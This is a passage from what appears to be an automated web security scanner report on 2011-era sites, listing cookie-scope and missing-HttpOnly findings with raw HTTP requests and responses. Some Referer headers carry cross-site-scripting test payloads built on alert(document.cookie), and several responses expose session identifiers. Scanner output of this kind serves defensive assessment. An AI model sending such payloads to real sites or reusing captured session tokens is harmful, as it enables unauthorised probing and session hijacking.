Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE; use_hitbox=3d11d5cb2b3e40e368f83f82e88170a4dAEAAAAx; GEO=5b80f4299f7903fea6e2637fc3585e04cwsAAAAzVVOtwdbzTTzh/A==;

Response

HTTP/1.1 303 See Other
Date: Mon, 24 Jan 2011 16:01:47 GMT
Server: wiseguy/0.6.7
Content-Length: 0
X-Content-Type-Options: nosniff
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Thu, 21-Jan-2021 16:01:47 GMT
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Location: http://www.youtube.com/das_captcha?next=http%3A//www.youtube.com/results%3Fhl%3Den%26q%3Dges%26um%3D1%26ie%3DUTF-8%26sa%3DN%26tab%3Dw1
Connection: close


13.234. http://www.youtube.com/subscribe_widget

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /subscribe_widget

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
  • GEO=0341a4aa07c201d99d06557f57bd4ecbcwsAAAAzVVOtwdbzTTzh+w==; path=/; domain=.youtube.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /subscribe_widget?p=joomla HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://community.joomla.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:20:43 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=0341a4aa07c201d99d06557f57bd4ecbcwsAAAAzVVOtwdbzTTzh+w==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 2953

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Subscribe to joomla</title>
<link rel="stylesheet" href="http://s.ytimg.c
...[SNIP]...

13.235. http://www.zazzle.com/netlingo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zazzle.com
Path:   /netlingo

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • zm=AQABAAAA8wcAABRS51j4EtDi9_oXt9FxROJyObhwRurz-b1BlGyLguagTvY6WTBoBb1sgEeFFIX6rKczW8ChxGhUVBWXLHNva6BIym6yAoY-4StNvvJUN6oKQP5Gr9F6snKOWkSXH-nGNXDxyJQV; domain=.zazzle.com; path=/
  • zs=6502D26E-A4F0-4420-AEC5-26B4B55758F8%7c0%7c12940404058%7c; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
  • us=FA9F74DB-FD90-49BE-A241-2728DB49B0ED; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /netlingo?rf=238222574511555904 HTTP/1.1
Host: www.zazzle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Expires: -1
Location: /netlingo
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: rfm=rf%3d238222574511555904%26rfd%3d348679991; path=/;
Set-Cookie: qsp=nu%3d%2fnetlingo%3frf%3d238222574511555904; path=/;
Set-Cookie: zm=AQABAAAA8wcAABRS51j4EtDi9_oXt9FxROJyObhwRurz-b1BlGyLguagTvY6WTBoBb1sgEeFFIX6rKczW8ChxGhUVBWXLHNva6BIym6yAoY-4StNvvJUN6oKQP5Gr9F6snKOWkSXH-nGNXDxyJQV; domain=.zazzle.com; path=/
Set-Cookie: zs=6502D26E-A4F0-4420-AEC5-26B4B55758F8%7c0%7c12940404058%7c; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
Set-Cookie: us=FA9F74DB-FD90-49BE-A241-2728DB49B0ED; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
Set-Cookie: general%5Fmaturity=1; domain=.zazzle.com; path=/
Set-Cookie: s=5246001291012673539; path=/
Date: Tue, 25 Jan 2011 04:40:58 GMT


13.236. http://www1.whdh.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • WHDHSTR=b67ab8cd4dbb526d8d29bbf7eb21f1ca; expires=Wed, 25-Jan-2012 21:54:00 GMT; path=/; domain=.whdh.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www1.whdh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:08 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: WHDHSTR=b67ab8cd4dbb526d8d29bbf7eb21f1ca; expires=Wed, 25-Jan-2012 21:54:00 GMT; path=/; domain=.whdh.com
Age: 0
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
X-doRedirect: false;
X-Version: 1.0;
Expires: Mon, 24 Jan 2011 21:55:08 GMT
Cache-Control: private, max-age=300
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 60121
Via: 1.1 dfw107022 (MII-APC/1.6)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH 7NEWS NBC Boston/Regional News, Weather, Traffic, Sports, Entertainment Coverage
...[SNIP]...

13.237. http://www3.whdh.com/mobile/phoneforecast/settings.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www3.whdh.com
Path:   /mobile/phoneforecast/settings.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • WHDHSTR=10276375ee09de38c9ed3d9e2f331510; expires=Thu, 26-Jan-2012 00:10:25 GMT; path=/; domain=.whdh.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile/phoneforecast/settings.php HTTP/1.1
Host: www3.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:10:25 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: WHDHSTR=10276375ee09de38c9ed3d9e2f331510; expires=Thu, 26-Jan-2012 00:10:25 GMT; path=/; domain=.whdh.com
Set-Cookie: PHPSESSID=b403bd4dcacdf2dc04e785e91ecaa8a7; path=/
Expires: Wed, 26 Jan 2011 00:10:25 GMT
Cache-Control: max-age=86400, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 10202

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Mobile Alerts - Daily Phone Forecast Account Settings</title>
<meta name="publisher"
...[SNIP]...

13.238. http://xads.zedo.com/ads3/a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xads.zedo.com
Path:   /ads3/a

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • FFgeo=5386156; path=/; EXPIRES=Wed, 25-Jan-12 00:11:14 GMT; DOMAIN=.zedo.com
  • ZEDOIDA=jgHX0goAACQAAH@dLJYAAAKY~012511; path=/; expires=Fri, 22-Jan-21 00:11:14 GMT; domain=.zedo.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ads3/a HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:14 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Wed, 25-Jan-12 00:11:14 GMT; DOMAIN=.zedo.com
Set-Cookie: ZEDOIDA=jgHX0goAACQAAH@dLJYAAAKY~012511; path=/; expires=Fri, 22-Jan-21 00:11:14 GMT; domain=.zedo.com
Expires: -1
Pragma: no-cache
Cache-Control: no-cache
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Length: 266
Connection: close
Content-Type: text/html

<HTML><HEAD></HEAD><BODY><a href='http://c1.zedo.com/ads3/c?a=0;x=0;g=172,0;c=0,0;i=19;n=0;w=47;m=82;s=0;z=42306355;k=http://www.zedo.com'TARGET='_blank'><img src='http://c1.zedo.com/OzoDB/0/0/0/blank
...[SNIP]...

13.239. http://xfactor.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xfactor.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • tm_identity=a4d8db2993601638d04abd7579c4807a; expires=Tue, 01-Feb-2011 04:40:45 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: xfactor.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 04:40:45 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=a4d8db2993601638d04abd7579c4807a; expires=Tue, 01-Feb-2011 04:40:45 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0037000179290771
X-Served-In: 0.97312808036804
X-Served-By: h03
Content-Length: 42682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

13.240. http://yoga.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://yoga.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • tm_identity=dc2ca952c1c37e52f76eb77141d10a94; expires=Tue, 01-Feb-2011 04:40:54 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: yoga.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 04:40:54 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=dc2ca952c1c37e52f76eb77141d10a94; expires=Tue, 01-Feb-2011 04:40:54 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.004396915435791
X-Served-In: 0.036845922470093
X-Served-By: ded2059
Content-Length: 40246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

13.241. http://youtube.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://youtube.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • tm_identity=94b6566617ce940cd794bf1274e16135; expires=Tue, 01-Feb-2011 04:41:00 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: youtube.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 04:41:00 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=94b6566617ce940cd794bf1274e16135; expires=Tue, 01-Feb-2011 04:41:00 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0044999122619629
X-Served-In: 0.045840978622437
X-Served-By: h01
Content-Length: 40368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

14. Cookie without HttpOnly flag set
There are 942 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



14.1. http://7newsboston.disqus.com/thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://7newsboston.disqus.com
Path:   /thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • sessionid=fc05e21a91a616ef2d73501d05b7cdf8; Domain=.disqus.com; expires=Mon, 07-Feb-2011 22:27:59 GMT; Max-Age=1209600; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/ HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 302 FOUND
Date: Mon, 24 Jan 2011 22:27:59 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: sessionid=fc05e21a91a616ef2d73501d05b7cdf8; Domain=.disqus.com; expires=Mon, 07-Feb-2011 22:27:59 GMT; Max-Age=1209600; Path=/
Location: http://7newsboston.disqus.com/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8


14.2. https://acc.newsguy.com/a/memsubmit.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://acc.newsguy.com
Path:   /a/memsubmit.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session-id=0e2d0ec1250f132ad68e906f4c3629b3; path=/
  • DIGEST=9X4cj3HMWW55_p6OOm9h6em4opp0oWW0L4d3d945a; path=/; domain=.newsguy.com;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/memsubmit.asp HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:46 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: session-id=0e2d0ec1250f132ad68e906f4c3629b3; path=/
Set-Cookie: DIGEST=9X4cj3HMWW55_p6OOm9h6em4opp0oWW0L4d3d945a; path=/; domain=.newsguy.com;
Content-Length: 5174
Expires: Mon, 24 Jan 2011 15:01:46 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>NewsGuy - Membership Drive</title>
<meta NAME="description" CONTENT="Automatically read, post, decode and track newsgroup messages
...[SNIP]...

14.3. http://advertising.aol.com/privacy/advertisingcom/opt-out

Summary

Severity:   Low
Confidence:   Firm
Host:   http://advertising.aol.com
Path:   /privacy/advertisingcom/opt-out

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • SESSff329d810a46b3a1bf645141daed34cf=93735d5185af6eada5ab3cadef0ec891; expires=Thu, 17 Feb 2011 02:03:09 GMT; path=/; domain=.advertising.aol.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy/advertisingcom/opt-out HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:29:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=93735d5185af6eada5ab3cadef0ec891; expires=Thu, 17 Feb 2011 02:03:09 GMT; path=/; domain=.advertising.aol.com
Last-Modified: Mon, 24 Jan 2011 21:11:57 GMT
ETag: "49e354d4a7310059e90b8f5c479565dd"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 31687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...

14.4. http://affiliate.kickapps.com/service/getWidget.kickAction

Summary

Severity:   Low
Confidence:   Firm
Host:   http://affiliate.kickapps.com
Path:   /service/getWidget.kickAction

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • JSESSIONID=2FD2E042C1D527E54DE4C7AE3124B7E1; Path=/
  • as=94274; Expires=Wed, 26-Jan-2011 02:23:05 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /service/getWidget.kickAction?as=94274&revision=14&widgetId=160832 HTTP/1.1
Host: affiliate.kickapps.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerapp_server_pool=1739565248.47135.0000

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2FD2E042C1D527E54DE4C7AE3124B7E1; Path=/
Set-Cookie: as=94274; Expires=Wed, 26-Jan-2011 02:23:05 GMT; Path=/
x-appserver: app1
Location: http://cdnserve.a-widget.com/service/getWidget2.kickAction?revision=14&as=94274&widgetId=160832
X-Cnection: close
Content-Length: 0
Date: Tue, 25 Jan 2011 02:23:05 GMT


14.5. https://billing.cloudaccess.net/cart.php

Summary

Severity:   Low
Confidence:   Firm
Host:   https://billing.cloudaccess.net
Path:   /cart.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=nlahukcb6v56uitl53v0m81g20; expires=Sat, 05-Mar-2011 13:56:09 GMT; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cart.php?a=add&pid=41 HTTP/1.1
Host: billing.cloudaccess.net
Connection: keep-alive
Referer: http://www.cloudaccess.net/pricing.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:09 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=nlahukcb6v56uitl53v0m81g20; expires=Sat, 05-Mar-2011 13:56:09 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9086


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...

14.6. http://cdn.beirut.com/GetImage.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://cdn.beirut.com
Path:   /GetImage.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=jstce2dl1tbrnkoho5s4o0q4h2; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /GetImage.php?imgtype=mainpicture&contacttype=event&typeid=16&contactid=5910&size=240x173 HTTP/1.1
Host: cdn.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jan 2011 02:20:40 GMT
Content-Type: image/jpeg
Connection: keep-alive
Set-Cookie: PHPSESSID=jstce2dl1tbrnkoho5s4o0q4h2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5988

...[SNIP]...

14.7. https://cloudaccess.infusionsoft.com/AddForms/processFormSecure.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://cloudaccess.infusionsoft.com
Path:   /AddForms/processFormSecure.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • JSESSIONID=00DE583E28DB9D9872BB85A1D8248900; Path=/; Secure
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AddForms/processFormSecure.jsp HTTP/1.1
Host: cloudaccess.infusionsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=00DE583E28DB9D9872BB85A1D8248900; Path=/; Secure
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 24 Jan 2011 15:01:55 GMT
Connection: close
Content-Length: 939


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equiv="X-UA-Compatibl
...[SNIP]...

14.8. http://community.parenthood.com/feed/get/type/rss/source/domain/id/40337

Summary

Severity:   Low
Confidence:   Firm
Host:   http://community.parenthood.com
Path:   /feed/get/type/rss/source/domain/id/40337

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • YUKUSESSID=nfe3mp9eu1on73emvsu6v31et7; expires=Tue, 08 Feb 2011 02:23:05 GMT; path=/; domain=community.parenthood.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feed/get/type/rss/source/domain/id/40337 HTTP/1.1
Host: community.parenthood.com
Proxy-Connection: keep-alive
Referer: http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CFC4B8F899936FBC1C797C6C4BB2DD5A; as=40337

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:05 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: YUKUSESSID=nfe3mp9eu1on73emvsu6v31et7; expires=Tue, 08 Feb 2011 02:23:05 GMT; path=/; domain=community.parenthood.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 13:28:38 GMT
ETag: "a525764423c1a7805bf59a00d8bf4c7c"
Content-Disposition: inline; filename=rss-feed.rss
Vary: Accept-Encoding
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: application/xml;charset=utf-8
Content-Length: 19977

<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/css" href="/feed/bypass/styles/feed.css" media="screen"?>
<?xml-stylesheet type="text/xsl" href="/feed/bypass/styles/feed.xsl"?>
<rss
...[SNIP]...

14.9. http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction

Summary

Severity:   Low
Confidence:   Firm
Host:   http://community.parenthood.com
Path:   /kickapps/service/getWidgetSwf.kickAction

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • JSESSIONID=CFC4B8F899936FBC1C797C6C4BB2DD5A; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kickapps/service/getWidgetSwf.kickAction HTTP/1.1
Host: community.parenthood.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 02:22:41 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=CFC4B8F899936FBC1C797C6C4BB2DD5A; Path=/
